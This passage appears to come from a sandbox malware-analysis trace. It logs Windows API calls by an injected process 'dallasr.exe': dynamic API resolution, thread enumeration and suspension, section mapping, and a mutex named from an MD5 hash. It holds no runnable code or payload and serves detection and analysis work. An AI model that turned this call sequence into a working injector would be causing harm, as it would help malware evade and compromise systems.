(hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.400] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.400] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.400] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.400] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.401] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.401] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.401] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.402] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.402] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.402] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.402] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.403] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.403] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.403] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.403] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.404] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.404] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.404] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.405] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.405] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.405] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.405] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.406] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.406] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.406] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.406] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.407] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.407] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.407] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.408] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.408] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.408] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.408] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.409] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.409] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.409] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.409] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.410] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.410] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.410] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.411] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.411] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.411] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.411] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.412] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.412] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.412] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.412] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.413] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.413] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.413] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.414] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.414] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.414] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.414] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.415] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.415] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.415] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.415] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.416] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.416] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.416] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.417] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.417] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.417] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.417] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.418] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.418] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.418] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.418] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.419] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.419] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.419] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.420] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.420] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.420] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.420] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.421] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.421] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.421] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.421] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.422] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.422] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.422] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.423] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.423] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.423] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.423] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.424] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.424] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.424] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.424] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.425] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.425] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.425] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.426] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.426] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.426] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.426] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.427] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.427] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.427] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.427] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.428] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.428] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.428] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.429] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.429] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.429] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.429] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.430] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.430] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.430] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.430] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.431] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.431] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.431] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.431] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.432] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.432] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.432] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.433] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.433] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.433] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.433] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.434] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.434] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.434] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.434] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.435] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.435] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.435] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.436] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.436] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.436] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.436] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.437] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.437] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.437] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.437] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.438] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.438] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.438] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.439] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.439] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.439] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.439] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.440] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.440] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.440] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.440] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.441] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.441] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.441] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.442] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.442] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.442] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.442] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.443] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.443] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.443] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.443] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.444] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.444] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.444] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.445] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.445] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.445] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.445] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.446] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.446] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.446] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.446] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.447] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.447] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.447] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.448] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.448] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.468] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x30c) returned 0x8c [0173.468] ResumeThread (hThread=0x8c) returned 0x1 [0173.468] CloseHandle (hObject=0x8c) returned 1 [0173.469] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9a0) returned 0x8c [0173.469] ResumeThread (hThread=0x8c) returned 0x1 [0173.469] CloseHandle (hObject=0x8c) returned 1 [0173.491] CloseHandle (hObject=0x88) returned 1 [0173.491] VirtualQuery (in: lpAddress=0xa509b0, lpBuffer=0x221f96c, dwLength=0x1c | out: lpBuffer=0x221f96c*(BaseAddress=0xa50000, AllocationBase=0xa30000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0173.491] GetProcessHeap () returned 0xa30000 [0173.491] HeapFree (in: hHeap=0xa30000, dwFlags=0x0, lpMem=0xa509b0 | out: hHeap=0xa30000) returned 1 [0173.491] VirtualQuery (in: lpAddress=0xa508a0, lpBuffer=0x221f96c, dwLength=0x1c | out: lpBuffer=0x221f96c*(BaseAddress=0xa50000, AllocationBase=0xa30000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0173.491] GetProcessHeap () returned 0xa30000 [0173.491] HeapFree (in: hHeap=0xa30000, dwFlags=0x0, lpMem=0xa508a0 | out: hHeap=0xa30000) returned 1 [0173.491] RtlExitUserThread (Status=0x0) Process: id = "36" image_name = "dallasr.exe" filename = "c:\\program files (x86)\\windows media player\\dallasr.exe" page_root = "0x67175000" os_pid = "0x7e0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "16" os_parent_pid = "0x958" cmd_line = "\"C:\\Program Files (x86)\\Windows Media Player\\dallasr.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows Media Player\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 276 os_tid = 0x99c Thread: id = 277 os_tid = 0x7e8 Thread: id = 278 os_tid = 0xb74 [0173.136] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76c20000 [0173.137] GetProcAddress (hModule=0x76c20000, lpProcName="Sleep") returned 0x76c310ff [0173.137] GetProcAddress (hModule=0x76c20000, lpProcName="ReadProcessMemory") returned 0x76c4cfcc [0173.137] GetProcAddress (hModule=0x76c20000, lpProcName="Thread32Next") returned 0x76cb5c3f [0173.137] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcatA") returned 0x76c52b7a [0173.137] GetProcAddress (hModule=0x76c20000, lpProcName="ExitThread") returned 0x7718d598 [0173.150] GetProcAddress (hModule=0x76c20000, lpProcName="MultiByteToWideChar") returned 0x76c3192e [0173.150] GetProcAddress (hModule=0x76c20000, lpProcName="RtlMoveMemory") returned 0x77193c40 [0173.150] GetProcAddress (hModule=0x76c20000, lpProcName="GetLastError") returned 0x76c311c0 [0173.150] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcmpiA") returned 0x76c33e8e [0173.151] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0173.151] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualAlloc") returned 0x76c31856 [0173.151] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0173.151] GetProcAddress (hModule=0x76c20000, lpProcName="OpenThread") returned 0x76c41248 [0173.151] GetProcAddress (hModule=0x76c20000, lpProcName="Process32Next") returned 0x76c588a4 [0173.151] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleFileNameA") returned 0x76c314b1 [0173.151] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleA") returned 0x76c31245 [0173.151] GetProcAddress (hModule=0x76c20000, lpProcName="CreateMutexA") returned 0x76c34c6b [0173.151] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0173.151] GetProcAddress (hModule=0x76c20000, lpProcName="CreateToolhelp32Snapshot") returned 0x76c5735f [0173.151] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentThreadId") returned 0x76c31450 [0173.151] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410 [0173.151] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessId") returned 0x76c311f8 [0173.152] GetProcAddress (hModule=0x76c20000, lpProcName="WriteProcessMemory") returned 0x76c4d9e0 [0173.152] GetProcAddress (hModule=0x76c20000, lpProcName="SuspendThread") returned 0x76c57d7e [0173.152] GetProcAddress (hModule=0x76c20000, lpProcName="ResumeThread") returned 0x76c343ef [0173.152] GetProcAddress (hModule=0x76c20000, lpProcName="RtlZeroMemory") returned 0x77193c10 [0173.152] GetProcAddress (hModule=0x76c20000, lpProcName="Thread32First") returned 0x76cb5b93 [0173.152] GetProcAddress (hModule=0x76c20000, lpProcName="CreateRemoteThread") returned 0x76cb416b [0173.152] GetProcAddress (hModule=0x76c20000, lpProcName="OpenProcess") returned 0x76c31986 [0173.152] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcessHeap") returned 0x76c314e9 [0173.152] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualFree") returned 0x76c3186e [0173.152] GetProcAddress (hModule=0x76c20000, lpProcName="Process32First") returned 0x76c58ae7 [0173.152] GetProcAddress (hModule=0x76c20000, lpProcName="HeapFree") returned 0x76c314c9 [0173.152] GetProcAddress (hModule=0x76c20000, lpProcName="HeapAlloc") returned 0x7715e026 [0173.152] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualQuery") returned 0x76c3445a [0173.153] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenA") returned 0x76c35a4b [0173.153] GetProcAddress (hModule=0x76c20000, lpProcName="IsWow64Process") returned 0x76c3195e [0173.153] GetProcAddress (hModule=0x76c20000, lpProcName="HeapReAlloc") returned 0x77171f6e [0173.153] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0173.153] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0173.153] GetProcAddress (hModule=0x74d40000, lpProcName="CryptReleaseContext") returned 0x74d4e124 [0173.153] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0173.153] GetProcAddress (hModule=0x74d40000, lpProcName="CryptGetHashParam") returned 0x74d4df7e [0173.153] GetProcAddress (hModule=0x74d40000, lpProcName="CryptCreateHash") returned 0x74d4df4e [0173.153] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0173.153] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x759b0000 [0173.162] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryA") returned 0x759e5d77 [0173.162] GetProcAddress (hModule=0x759b0000, lpProcName="CryptBinaryToStringA") returned 0x759ea8c5 [0173.162] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x74850000 [0173.166] GetProcAddress (hModule=0x74850000, lpProcName="DnsFree") returned 0x7485436b [0173.166] GetProcAddress (hModule=0x74850000, lpProcName="DnsQuery_W") returned 0x7486572c [0173.166] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77130000 [0173.166] GetProcAddress (hModule=0x77130000, lpProcName="NtCreateSection") returned 0x7714ff94 [0173.166] GetProcAddress (hModule=0x77130000, lpProcName="NtSetInformationProcess") returned 0x7714fb18 [0173.166] GetProcAddress (hModule=0x77130000, lpProcName="NtMapViewOfSection") returned 0x7714fc40 [0173.166] GetProcAddress (hModule=0x77130000, lpProcName="LdrProcessRelocationBlock") returned 0x771de9cf [0173.166] GetProcAddress (hModule=0x77130000, lpProcName="NtUnmapViewOfSection") returned 0x7714fc70 [0173.166] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0173.167] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfW") returned 0x74f7e061 [0173.167] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfA") returned 0x74f6ae5f [0173.167] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x747f0000 [0173.169] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpReadData") returned 0x747fcb9e [0173.169] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpAddRequestHeaders") returned 0x74809dfb [0173.169] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpCrackUrl") returned 0x7480953a [0173.169] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpGetProxyForUrl") returned 0x747fd5dc [0173.169] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpenRequest") returned 0x747f4aea [0173.170] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpen") returned 0x747f58b9 [0173.170] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpCloseHandle") returned 0x747f2c01 [0173.170] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpSendRequest") returned 0x747f79bd [0173.170] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpGetIEProxyConfigForCurrentUser") returned 0x7480257e [0173.170] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpSetOption") returned 0x747f3f6c [0173.170] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpReceiveResponse") returned 0x747fb262 [0173.170] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpConnect") returned 0x747fd9f5 [0173.170] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75bc0000 [0173.170] GetProcAddress (hModule=0x75bc0000, lpProcName=0xc) returned 0x75bcb131 [0173.170] GetProcAddress (hModule=0x75bc0000, lpProcName=0x5) returned 0x75bc7147 [0173.170] GetProcAddress (hModule=0x75bc0000, lpProcName=0xf) returned 0x75bc2d8b [0173.170] VirtualProtect (in: lpAddress=0x70000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x243feb8 | out: lpflOldProtect=0x243feb8*=0x40) returned 1 [0173.171] VirtualProtect (in: lpAddress=0x70000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x243feb8 | out: lpflOldProtect=0x243feb8*=0x4) returned 1 [0173.171] VirtualQuery (in: lpAddress=0x80016, lpBuffer=0x243feb0, dwLength=0x1c | out: lpBuffer=0x243feb0*(BaseAddress=0x80000, AllocationBase=0x80000, AllocationProtect=0x40, RegionSize=0x1000, State=0x1000, Protect=0x40, Type=0x40000)) returned 0x1c [0173.171] GetProcessHeap () returned 0x330000 [0173.171] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x364) returned 0x350568 [0173.172] RtlMoveMemory (in: Destination=0x350568, Source=0x80016, Length=0x363 | out: Destination=0x350568) [0173.172] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x80016) returned 0x0 [0173.172] GetCurrentProcessId () returned 0x7e0 [0173.172] GetProcessHeap () returned 0x330000 [0173.172] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x105) returned 0x3508d8 [0173.172] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x3508d8, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Windows Media Player\\dallasr.exe" (normalized: "c:\\program files (x86)\\windows media player\\dallasr.exe")) returned 0x37 [0173.172] GetProcessHeap () returned 0x330000 [0173.172] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x105) returned 0x3509e8 [0173.172] GetCurrentProcessId () returned 0x7e0 [0173.172] wsprintfA (in: param_1=0x3509e8, param_2="%s%d%d%d" | out: param_1="C:\\Program Files (x86)\\Windows Media Player\\dallasr.exe37084212420163") returned 69 [0173.172] CryptAcquireContextA (in: phProv=0x243feb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x243feb4*=0x350b38) returned 1 [0173.187] CryptCreateHash (in: hProv=0x350b38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x243feb8 | out: phHash=0x243feb8) returned 1 [0173.187] lstrlenA (lpString="C:\\Program Files (x86)\\Windows Media Player\\dallasr.exe37084212420163") returned 69 [0173.187] CryptHashData (hHash=0x351468, pbData=0x3509e8, dwDataLen=0x45, dwFlags=0x0) returned 1 [0173.187] CryptGetHashParam (in: hHash=0x351468, dwParam=0x2, pbData=0x243fea4, pdwDataLen=0x243febc, dwFlags=0x0 | out: pbData=0x243fea4, pdwDataLen=0x243febc) returned 1 [0173.187] wsprintfA (in: param_1=0x3509e8, param_2="%02X" | out: param_1="BF") returned 2 [0173.187] wsprintfA (in: param_1=0x3509ea, param_2="%02X" | out: param_1="6C") returned 2 [0173.187] wsprintfA (in: param_1=0x3509ec, param_2="%02X" | out: param_1="C7") returned 2 [0173.187] wsprintfA (in: param_1=0x3509ee, param_2="%02X" | out: param_1="80") returned 2 [0173.187] wsprintfA (in: param_1=0x3509f0, param_2="%02X" | out: param_1="AE") returned 2 [0173.187] wsprintfA (in: param_1=0x3509f2, param_2="%02X" | out: param_1="0C") returned 2 [0173.187] wsprintfA (in: param_1=0x3509f4, param_2="%02X" | out: param_1="D1") returned 2 [0173.187] wsprintfA (in: param_1=0x3509f6, param_2="%02X" | out: param_1="AA") returned 2 [0173.187] wsprintfA (in: param_1=0x3509f8, param_2="%02X" | out: param_1="60") returned 2 [0173.187] wsprintfA (in: param_1=0x3509fa, param_2="%02X" | out: param_1="EC") returned 2 [0173.187] wsprintfA (in: param_1=0x3509fc, param_2="%02X" | out: param_1="B9") returned 2 [0173.187] wsprintfA (in: param_1=0x3509fe, param_2="%02X" | out: param_1="D7") returned 2 [0173.187] wsprintfA (in: param_1=0x350a00, param_2="%02X" | out: param_1="86") returned 2 [0173.187] wsprintfA (in: param_1=0x350a02, param_2="%02X" | out: param_1="3E") returned 2 [0173.187] wsprintfA (in: param_1=0x350a04, param_2="%02X" | out: param_1="07") returned 2 [0173.187] wsprintfA (in: param_1=0x350a06, param_2="%02X" | out: param_1="B0") returned 2 [0173.187] CryptDestroyHash (hHash=0x351468) returned 1 [0173.187] CryptReleaseContext (hProv=0x350b38, dwFlags=0x0) returned 1 [0173.187] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="BF6CC780AE0CD1AA60ECB9D7863E07B0") returned 0x80 [0173.188] GetLastError () returned 0x0 [0173.188] Sleep (dwMilliseconds=0x1f4) [0173.716] GetCurrentProcessId () returned 0x7e0 [0173.716] GetCurrentThreadId () returned 0xb74 [0173.716] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x88 [0173.718] Thread32First (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.718] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.719] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.719] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.719] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.719] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.720] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.720] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.720] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.721] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.721] Thread32Next (hSnapshot=0x88, 